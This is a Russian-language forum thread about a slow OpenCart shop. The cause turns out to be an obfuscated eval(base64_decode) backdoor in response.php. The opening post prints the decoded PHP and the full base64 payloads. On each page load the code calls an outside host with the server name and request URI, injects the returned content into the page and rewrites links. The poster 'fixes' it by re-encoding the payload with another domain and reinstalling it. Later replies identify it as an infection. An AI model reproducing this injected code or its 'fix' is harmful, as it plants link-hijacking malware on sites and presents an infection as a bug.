Jump to content
Sign in to follow this  
Plinio

Тормозил сайт из-за ссылки на myopencart.net

Recommended Posts

Здравствуйте,

неделю тормозил сайт, не мог понять из-за чего. Списался с техподдержкой 1gb.ru (на этом хостинге у меня сайт) и выяснилось следующее:

 

1. после установки скрипта времени генерации страницы (вставлять в index.php - в начало 1 часть и в конец вторую часть кода):

 

 

 

 

// 1 часть кода

<?php  

// фиксация времени начала генерации страницы  
$begin = microtime();  
// матрица начального времени с секундами и миллисекундами  
$arrbegin = explode(" ",$begin);  
// Полное начальное время
$allbegin = $arrbegin[1] + $arrbegin[0];  

?>  
//......код файла index.php здесь.......

 

 

//  2 часть кода, ставится в конце:

<?php  

// фиксация времени останова   
$stop = microtime();  
// матрица времени останова с секундами и миллисекундами  
$arrend = explode(" ",$stop);  
// Полное время останова
$allend = $arrend[1] + $arrend[0];  
// вычитание из конечного времени начального  
$alltime = $allend - $allbegin;  

// вывод в браузер времени генерации страницы  
$format = "Страница сгенерирована за %f секунд";
printf($format,$alltime);  

?>
 

 

 

 

понял что страница на сайте грузится 5-6 секунд.

 

2. После 2 дней полемики с техподдержкой, мне дали нормальный ответ:

В коде сайта, точнее в файле system/library/response.php

есть следующая строка:


$ouput = eval(base64_decode(тут закодированный скрипт='));
Она находится в самом в конце, можете сами убедится.
Если его расшифровать, то получим следующий код:

function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return false;
                break;
        }
}

if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "http://opencart.com", "http://=^_^=.ru",
"http://myopencart.ru", "https://opencartforum.com", "http://opencart.ru", "http://opencart.by");
$replace = array("", $ftend, "http://myopencart.net", "http://myopencart.net",
"http://myopencart.net", "http://myopencart.net", "http://myopencart.net", "http://myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}
Из которого видно что скрипт обращается к myopencart.net, для

которого не прописан IP:


$ dig a myopencart.net
; <<>> DiG 9.9.2-P1 <<>> a myopencart.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 62470
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL:
0
;; QUESTION SECTION:
;myopencart.net.                        IN      A
3. В итоге на сайте _ttp://www.codenet.ru/services/base64_encode-base64_decode/ расшифровал зашифрованный код, опять же через этот сайт его зашифровал, только вместо myopencart.net, написал myopencart.ru

 

в итоге зашифрованный код установил в файл system/library/response.php вместо старого:

 

1. Такой был


ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0=
 

 

2 Такой стал


ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0LnJ1L2dvb2dsZWNvZGUvYXBpL2FwaS5waHA/c2VydmVyPSIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uIiZwYWdlPSIuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKXsKJGZpbmQgPSBhcnJheSgiPC9ib2R5PiIsICI8L2h0bWw+IiwgIm9wZW5jYXJ0LmNvbSIsICJtYXh6b24ucnUiLCAibXlvcGVuY2FydC5ydSIsICJvcGVuY2FydGZvcnVtLnJ1IiwgIm9wZW5jYXJ0LnJ1IiwgIm9wZW5jYXJ0LmJ5Iik7CiRyZXBsYWNlID0gYXJyYXkoIiIsICRmdGVuZCwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1IiwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1Iik7CiRvdXB1dCA9IHN0cl9yZXBsYWNlKCRmaW5kLCAkcmVwbGFjZSwgJG91cHV0KTsKaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCJvZmYiKTsKZXJyb3JfcmVwb3J0aW5nKDApOwplY2hvICRvdXB1dDt9CmVsc2UgewplY2hvICRvdXB1dDsKfQ==
 

 

 

 

После этого сайт стал грузится за 0,5 - 1 секунду, вместо 5-6. Видимо недоработка движка.

Edited by rb2
unlink
  • +1 3

Share this post


Link to post
Share on other sites

Вот спасибо тебе!

поменял, скорость загрузки выросла с 5.5 до 0.91 секунды!

Share this post


Link to post
Share on other sites

Вот спасибо тебе!

поменял, скорость загрузки выросла с 5.5 до 0.91 секунды!

Неправильно даже сделал оказывается, более правильно написано в разделе форума:

 

https://opencartforum.com/topic/22202-proverka-na-nalichie-vredonosnogo-koda-na-vashikh/

  • +1 1

Share this post


Link to post
Share on other sites

Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

Share this post


Link to post
Share on other sites

Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

Можно и нужно

Share this post


Link to post
Share on other sites

Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

Можно и нужно

Нужно заменить файл response.php на нормальный, не взломанный http://opencartforum...oda-na-vashikh/

Share this post


Link to post
Share on other sites

Здравствуйте,

неделю тормозил сайт, не мог понять из-за чего. Списался с техподдержкой 1gb.ru (на этом хостинге у меня сайт) и выяснилось следующее:

...........

После этого сайт стал грузится за 0,5 - 1 секунду, вместо 5-6. Видимо недоработка движка.

 

Спасибо за пояснение!

А какая у вас версия опенкарта?

Почему недоработка? Это же поясняется в этой ветке настоящего форума, это заражение файла было! Удалите этот код, либо просто файл замените!

 

Я для проверки скачал два разных дистрибутива ocStore 1.5.4.1 с какого-то стороннего ресурса и с гугла хранилища, ни в одном нет такого кода, ну понятное дело что это было не на всех архивах. Да и дистрибутивы от октября 2012 года, хотя написано что заражены были в апреле 2013 где-то они...

 

Будем знать что такое бывает. Только стал просматривать инфу по установке магазина и "на тебе" такие заявочки нехорошие...

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.